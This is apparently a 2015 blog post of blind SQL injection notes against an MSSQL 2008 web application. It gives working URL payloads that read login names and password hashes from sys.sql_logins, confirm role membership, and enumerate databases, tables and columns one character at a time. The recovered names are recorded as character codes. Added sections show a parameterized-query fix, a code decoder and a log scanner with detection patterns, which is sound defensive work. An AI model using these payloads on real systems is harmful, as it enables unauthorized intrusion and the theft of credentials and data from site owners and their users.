MSSQL 2008 blind injection notes

2015-03-14 16:58:47 | Category: SQL injection
MSSQL database test:
(select count(*) from sysobjects)>0

SELECT UNICODE(SUBSTRING((system_user),1,1))
Username = dzxl

Relevant login data: sys.sql_logins exposes name and password_hash; master.dbo.fn_varbintohexstr(password_hash) renders the hash as a hex string.

MSSQL 2008 version check:

http://123.com/Result.aspx?cn=a%' and substring((select @@version),22,4)='2008' and '%'='
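Every payload in these notes has the shape a%' and <condition> and '%'=', which only works because the application splices the cn parameter into a LIKE '%...%' string. As an added example (not from the original notes), here is that filter built both the unsafe way and the parameterized way; sqlite3 stands in for SQL Server so the block runs offline, and the journal table, its rows and the probe strings are constructed.

```python
# Added example, not from the original notes: the LIKE '%...%' filter that the
# a%' ... and '%'=' payload shape implies, built the unsafe way and the
# parameterized way. sqlite3 stands in for SQL Server so the block runs
# offline; the journal table, its rows and the probe strings are constructed.
import sqlite3

def make_db():
    """Constructed in-memory table standing in for the application's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE journal (id INTEGER, cn TEXT)")
    conn.executemany("INSERT INTO journal VALUES (?, ?)",
                     [(1, "alpha"), (2, "beta"), (3, "gamma")])
    return conn

def search_unsafe(conn, cn):
    """String concatenation: the input can close the quote and add conditions."""
    sql = "SELECT id FROM journal WHERE cn LIKE '%" + cn + "%'"
    return [row[0] for row in conn.execute(sql)]

def escape_like(value, esc="\\"):
    """Make LIKE wildcards in user input match literally.

    '%' and '_' are wildcards everywhere; '[' also starts a character class
    in SQL Server, so it is escaped too (harmless on SQLite).
    """
    out = value.replace(esc, esc + esc)
    for ch in "%_[":
        out = out.replace(ch, esc + ch)
    return out

def search_safe(conn, cn):
    """Bound parameter: the input is data, never part of the statement."""
    pattern = "%" + escape_like(cn) + "%"
    rows = conn.execute("SELECT id FROM journal WHERE cn LIKE ? ESCAPE '\\'", (pattern,))
    return [row[0] for row in rows]

# Constructed probes in the shape the notes use: one true tail, one false tail.
PROBE_TRUE = "a%' and 1=1 and '%'='"
PROBE_FALSE = "a%' and 1=2 and '%'='"

if __name__ == "__main__":
    db = make_db()
    print("unsafe, true probe :", search_unsafe(db, PROBE_TRUE))   # every row containing 'a'
    print("unsafe, false probe:", search_unsafe(db, PROBE_FALSE))  # no rows: the boolean oracle
    print("safe, true probe   :", search_safe(db, PROBE_TRUE))     # no rows: treated as a literal
    print("safe, normal input :", search_safe(db, "alph"))         # [1]
```

With concatenation the two probes return different row sets, which is exactly the true/false signal the notes read off the page. With the bound parameter the same strings are searched for literally and nothing matches; the ESCAPE clause additionally stops user-supplied '%' or '_' from widening the match.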

public role membership:

1=(select IS_SRVROLEMEMBER('public'))

Login names (sys.sql_logins):

http://123.com/Result.aspx?cn=a%' and  unicode(substring(convert(varchar(254),(select top 1 name from sys.sql_logins)),1,1) ) >100 and '%'='

115 97 sa

http://123.com/Result.aspx?cn=a%' and  ascii(substring((select top 1 name from sys.sql_logins where name not in ('sa')),1,1)) >100 and '%'='

100 122 120 108 dzxl

Password hash (sys.sql_logins.password_hash):

http://123.com/Result.aspx?cn=a%' and  unicode(substring(convert(varchar(254),(select top 1 master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins)),1,1) ) >100 and '%'='

http://123.com/Result.aspx?cn=a%' and  unicode(substring(convert(varchar(254),(select top 1 password_hash from sys.sql_logins)),1,1) ) >100 and '%'='

Number of databases:
http://123.com/Result.aspx?cn=a%' and (select count(*) from master.dbo.sysdatabases)=10 and '%'='

dbid 1 to 5 are system databases; only dbid 6 and above need to be identified.
http://123.com/Result.aspx?cn=a%' and  (select count(*) from master.dbo.sysdatabases where dbid=6)=1 and '%'='

Database name length:
http://123.com/Result.aspx?cn=a%' and  (select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=12)=1 and '%'='

Guess the database name character by character:
http://123.com/Result.aspx?cn=a%' and  (select count(*) from master.dbo.sysdatabases where dbid=6 and ascii(substring(name,1,1))=82)=1 and '%'='

dbid=1   109 97 115 116 101 114   master
dbid=2   116 101 109 112 100 98   tempdb
dbid=3   109 111 100 101 108   model
dbid=4   109 115 100 98   msdb
dbid=5   82 101 112 111 114 116 83 101 114 118 101 114   ReportServer
dbid=6   82 101 112 111 114 116 83 101 114 118 101 114 118 101 114 84 101 109 112 68 66   ReportSerververTempDB
dbid=7   100 122 108 120 120 98 95 106 111 117 114 110 97 108   dzlxxb_journal
dbid=8   100 122 108 120 120 98 95 119 101 98 115 105 116 101   dzlxxb_website
dbid=9   100 122 108 120 120 98 95 109 97 105 110   dzlxxb_main
dbid=10  68 90 76 88 95 68 66   DZLX_DB
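The lists of numbers above are decimal character codes, one per request, with the recovered name written after them. As an added example (not from the original notes), here is a small decoder that parses lines in that format and checks that the codes really spell the annotated name; the first three sample lines are copied from the notes, the fourth is constructed with a deliberate mismatch.

```python
# Added example, not from the original notes: decode the decimal character
# codes the notes record for each guessed name and check them against the
# name written next to them. The first three lines are copied from the
# notes; the fourth is a constructed line with a deliberate mismatch.
NOTE_LINES = [
    "dbid=1 109 97 115 116 101 114 master",
    "dbid=5 82 101 112 111 114 116 83 101 114 118 101 114 ReportServer",
    "115 97 sa",
    "dbid=99 116 101 115 116 tset",   # constructed: the codes spell "test"
]

def decode_codes(codes):
    """Turn a list of decimal code points into the string they spell."""
    return "".join(chr(c) for c in codes)

def parse_note_line(line):
    """Split '[label] <codes...> [annotation]' into (label, codes, annotation).

    The label (e.g. 'dbid=1') and the annotation are optional; both are
    recognised simply by not being all digits.
    """
    tokens = line.split()
    label = tokens[0] if not tokens[0].isdigit() else ""
    annotation = tokens[-1] if not tokens[-1].isdigit() else ""
    codes = [int(t) for t in tokens if t.isdigit()]
    return label, codes, annotation

def check_note_line(line):
    """Return (label, decoded name, whether it matches the annotation)."""
    label, codes, annotation = parse_note_line(line)
    decoded = decode_codes(codes)
    return label, decoded, decoded == annotation

def check_all(lines=NOTE_LINES):
    """Check every line and collect the labels (or names) that disagree."""
    results = [check_note_line(line) for line in lines]
    mismatches = [label or decoded for label, decoded, ok in results if not ok]
    return results, mismatches

if __name__ == "__main__":
    for label, decoded, ok in check_all()[0]:
        print(f"{label or '-':8} {decoded:24} {'ok' if ok else 'MISMATCH'}")
```

Running the whole list of a session through this check is a quick way to catch transcription slips, since a single wrong or duplicated code silently changes the recovered name.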

http://123.com/Result.aspx?cn=a%' and  (ascii(substring((select top 1 table_name from information_schema.tables),1,1))=84) and '%'='

First table name:

http://123.com/Result.aspx?cn=a%' and (ascii(substring((select top 1 table_name from information_schema.tables where table_name not in ('T_BH_userLabel')),1,1))=84 ) and '%'='

84 95 66 72 95 117 115 101 114 76 97 98 101 108 T_BH_userLabel
Column names:

http://123.com/Result.aspx?cn=a%' and (ascii(substring((select top 1 column_name from information_schema.columns where table_name='T_BH_userLabel' and column_name not in ('f_ulab_ID')),1,1))=84 ) and '%'='

102 95 117 108 97 98 95 73 68 f_ulab_ID

http://123.com/Result.aspx?cn=a%' and (ascii(substring((select top 1 column_name from information_schema.columns where column_name not in ('f_ulab_ID')),1,1))=84 ) and '%'='

102 95 117 108 97 98 95 110 97 109 101 f_ulab_name

102 95 117 108 97 98 95 115 113 108 f_ulab_sql

102 95 117 108 97 98 95 99 111 110 116 101 110 116 f_ulab_content

102 95 117 108 97 98 95 105 110 110 101 114 67 111 110 116 101 110 116 f_ulab_innerContent

Second table name:

116 95 66 72 95 80 101 114 109 105 115 115 105 111 110 115 t_BH_Permissions

http://123.com/Result.aspx?cn=a%' and (ascii(substring((select top 1 column_name from information_schema.columns where table_name ='t_BH_Permissions'),1,1))=84 ) and '%'='

102 95 112 101 114 95 73 68 f_per_ID

http://123.com/Result.aspx?cn=a%' and (ascii(substring((select top 1 column_name from information_schema.columns where table_name ='t_BH_Permissions' and column_name not in ('f_per_ID')),1,1))=102 ) and '%'='

102 95 114 111 108 101 95 73 68 f_role_ID

102 95 112 97 115 115 112 111 114 116 95 73 68 f_passport_ID

102 95 99 104 97 110 110 101 108 95 73 68 f_channel_ID

Third table name:

116 95 66 72 95 104 111 116 87 111 114 100 t_BH_hotWord

Fourth table name:

116 95 66 72 95 65 116 116 114 105 98 117 116 101 t_BH_Attribute

Fifth table name:

115 121 115 100 105 97 103 114 97 109 115 sysdiagrams

Sixth table name:

116 95 66 72 95 97 99 99 101 115 115 111 114 105 101 115 t_BH_accessories

Seventh table name:
116 95 66 72 95 99 111 110 116 101 110 116 84 121 112 101 t_BH_contentType

http://123.com/Result.aspx?cn=a%' and  unicode(substring(convert(varchar(254),(select count(*) from sysobjects where xtype='u')),1,1) ) =95 and '%'='

?cn=a%' and  unicode(substring(convert(varchar(254),(select top 1 name from sys.sql_logins)),1
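Seen from the server side, a session like the one recorded above is hundreds of near-identical requests from one client, each carrying the same tell-tale fragments. As an added example (not from the original notes), here is a scanner that URL-decodes access-log entries, matches the markers that recur in these payloads, and flags clients that send several such requests; the log lines are constructed and simplified (client IP, path, raw query string), so a real deployment needs a real log parser in front of it.

```python
# Added example, not from the original notes: scan access-log entries for the
# boolean-based blind injection markers used in the payloads above and flag
# clients that send several of them. Log lines are constructed and simplified
# (client IP, path, raw query string); real logs need a real parser.
import re
from collections import Counter
from urllib.parse import unquote_plus

# Markers drawn from the payloads in the notes, applied after URL decoding.
MARKERS = [
    r"'%'=",                                       # tail that rebalances a LIKE '%...%' clause
    r"\b(?:ascii|unicode)\s*\(\s*substring\s*\(",  # character-at-a-time probes
    r"\bsys\.sql_logins\b",                        # login names and password hashes
    r"\bsysobjects\b",
    r"\bsysdatabases\b",
    r"\binformation_schema\.(?:tables|columns)\b",
    r"\bis_srvrolemember\s*\(",
]
MARKER_RE = re.compile("|".join(MARKERS), re.IGNORECASE)

# Constructed log lines: the injection ones mirror the notes' payloads, URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 /Result.aspx cn=a%25%27+and+ascii(substring((select+top+1+name+from+sys.sql_logins),1,1))%3E100+and+%27%25%27%3D
203.0.113.5 /Result.aspx cn=a%25%27+and+(select+count(*)+from+master.dbo.sysdatabases)%3D10+and+%27%25%27%3D
198.51.100.7 /Result.aspx cn=network+security
203.0.113.5 /Result.aspx cn=a%25%27+and+unicode(substring(convert(varchar(254),(select+top+1+name+from+sys.sql_logins)),1,1))%3E100+and+%27%25%27%3D
198.51.100.9 /Result.aspx cn=O%27Reilly
"""

def parse_log_line(line):
    """Return (client_ip, path, decoded query string) for one constructed line."""
    ip, path, query = line.split(" ", 2)
    return ip, path, unquote_plus(query)

def find_markers(decoded_query):
    """Return the distinct marker texts present in a decoded query string."""
    return sorted({m.group(0).lower() for m in MARKER_RE.finditer(decoded_query)})

def scan_log(text, threshold=2):
    """Return (flagged entries, clients with at least `threshold` flagged requests).

    Boolean-based blind injection needs one request per character or bit, so
    the per-client count is a stronger signal than any single request.
    """
    flagged = []
    per_client = Counter()
    for line in text.splitlines():
        if not line.strip():
            continue
        ip, path, query = parse_log_line(line)
        markers = find_markers(query)
        if markers:
            flagged.append((ip, path, markers))
            per_client[ip] += 1
    suspicious = sorted(ip for ip, n in per_client.items() if n >= threshold)
    return flagged, suspicious

if __name__ == "__main__":
    entries, clients = scan_log(SAMPLE_LOG)
    for ip, path, markers in entries:
        print(ip, path, ", ".join(markers))
    print("clients over threshold:", clients)
```

The apostrophe in O'Reilly is deliberately left unflagged: a lone quote is normal input, whereas the rebalancing '%'= tail combined with catalog-view names and per-character functions is not. Decoding before matching matters because the same payload can arrive percent-encoded, plus-encoded, or mixed.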
Copyright NetEase ©1997-2017